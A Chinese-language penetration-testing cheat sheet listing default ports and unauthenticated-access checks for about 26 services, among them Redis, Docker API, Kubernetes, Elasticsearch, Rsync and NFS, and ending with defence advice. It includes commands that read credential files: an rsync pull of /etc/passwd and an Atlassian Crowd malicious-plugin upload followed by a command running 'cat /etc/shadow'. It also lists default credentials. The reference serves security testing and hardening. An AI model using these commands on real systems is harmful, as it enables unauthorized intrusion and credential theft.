端口未授权总结(外部打点)
字数 1638 2025-08-19 12:42:30
端口未授权访问漏洞全面总结与利用指南
一、概述
端口未授权访问是网络安全中常见的高危漏洞,攻击者无需认证即可直接访问服务接口或管理界面,可能导致信息泄露、权限提升甚至远程代码执行。本文全面总结了27种常见服务的未授权访问漏洞及其利用方法。
二、常见未授权访问漏洞详解
1. Memcached 未授权访问
- 默认端口: 11211
- 验证方法:
telnet 10.10.4.89 11211 nc -vv 10.10.4.89 11211 - 利用命令:
stats查看服务信息
2. ZooKeeper 未授权访问
- 默认端口: 2181, 2182
- 验证方法:
Windows:./zkCli.sh -timeout 0 -r -server 10.10.4.72:2181zkCli.cmd -timeout 0 -r -server 10.10.4.72:2181
3. Elasticsearch 未授权访问
- 默认端口: 9100, 9200, 9300
- 验证方法:
curl http://10.2.20.48:9200/ curl http://10.2.20.48:9200/_cat curl http://10.2.20.48:9200/_cat/_river/_search curl http://10.2.20.48:9200/cat/indices curl http://10.2.20.48:9100/metrics
4. Kibana 未授权访问
- 默认端口: 5601
- 验证方法: 直接访问
https://10.10.4.89:5601/ https://10.10.4.89/app/kibana
5. Docker Remote API 未授权访问
- 默认端口: 2375
- 验证方法:
http://10.10.4.89:2375/ http://10.10.4.89:2375/version docker -H tcp://10.10.4.89:2375 version docker -H tcp://10.10.4.89:2375 images
6. Kubernetes Api Server 未授权访问
- 默认端口: 8080, 6443
- 验证方法:
http://10.10.4.89:8080/ http://10.10.4.89:8080/ui http://192.168.56.101:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login
7. Hadoop 未授权访问
- 默认端口: 8088
- 验证方法:
http://192.168.18.129:8088/cluster curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json
8. Jenkins未授权访问
- 默认端口: 8080
- 验证方法:
http://192.168.18.129:8080/manage
9. ActiveMQ未授权访问
- 默认端口: 8161
- 默认凭证: admin/admin
10. RabbitMQ未授权访问
- 验证URL:
http://10.10.4.89:15672 http://10.10.4.89:25672/ http://10.10.4.89:15692/ - 默认凭证: guest/guest
11. Springboot actuator 未授权访问
- 特征: 绿叶子图标和报错页面
- 验证方法:
http://10.2.20.48:/autoconfig
12. FTP未授权访问(匿名登录)
- 默认端口: 21
- 验证方法:
ftp://ip:port/
13. JBOSS 未授权访问
- 特征: 8080端口左上角有JBoss logo
- 验证方法:
http://ip:jboss端口/jmx-console http://ip:jboss端口/web-console
14. LDAP未授权访问
- 验证方法: 使用ldapbrowser直接连接获取目录内容
15. Rsync 未授权访问
- 默认端口: 873
- 验证方法:
rsync rsync://{target_ip}/ rsync rsync://172.16.2.250:873/src rsync rsync://172.16.2.250:873/src/etc/passwd ./
16. VNC 未授权访问
- 默认端口: 5900, 5901
- 验证方法:
vncviewer 192.168.15.8
17. Dubbo 未授权访问
- 验证方法:
telnet IP port
18. NFS 共享目录未授权访问
- 默认端口: 2049, 20048
- 验证方法:
showmount -e 192.168.70.162 mount -t nfs 192.168.70.162:/grdata /mnt
19. Druid 未授权访问
- 常见路径:
/druid/websession.html /system/druid/websession.html /webpage/system/druid/websession.html
20. CouchDB 未授权访问
- 默认端口: 5984
- 验证方法:
curl http://192.168.18.129:5984 curl http://192.168.18.129:5984/_config
21. Atlassian Crowd 未授权访问
- 默认端口: 8095
- 利用方法:
访问:curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -vhttp://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
22. Jupyter Notebook 未授权访问
- 验证方法: 访问
http://192.168.18.129:8888通过Terminal执行命令
23. Windows IPC共享未授权访问
- 默认端口: 139
24. RTSP未授权访问
- 默认端口: 554
- 特征: 视频流直接暴露
25. Redis未授权访问
- 默认端口: 6379
- 验证方法:
redis-cli -h 10.2.20.73 -p 6379 10.2.20.73:6379> info
26. MongoDB未授权访问
- 默认端口: 27017
- 验证方法:
mongo --host 10.2.20.34 --port 27017 xxx-test:SECONDARY> show dbs
三、防御建议
- 修改默认端口
- 配置访问控制列表(ACL)
- 启用身份验证机制
- 限制网络访问(防火墙规则)
- 定期更新服务版本
- 监控异常访问行为
四、总结
本文详细列出了27种常见服务的未授权访问漏洞及其验证方法,安全人员可利用这些信息进行安全检测,管理员则应针对这些风险点加强防护。记住,发现漏洞后应及时修复,避免被恶意利用。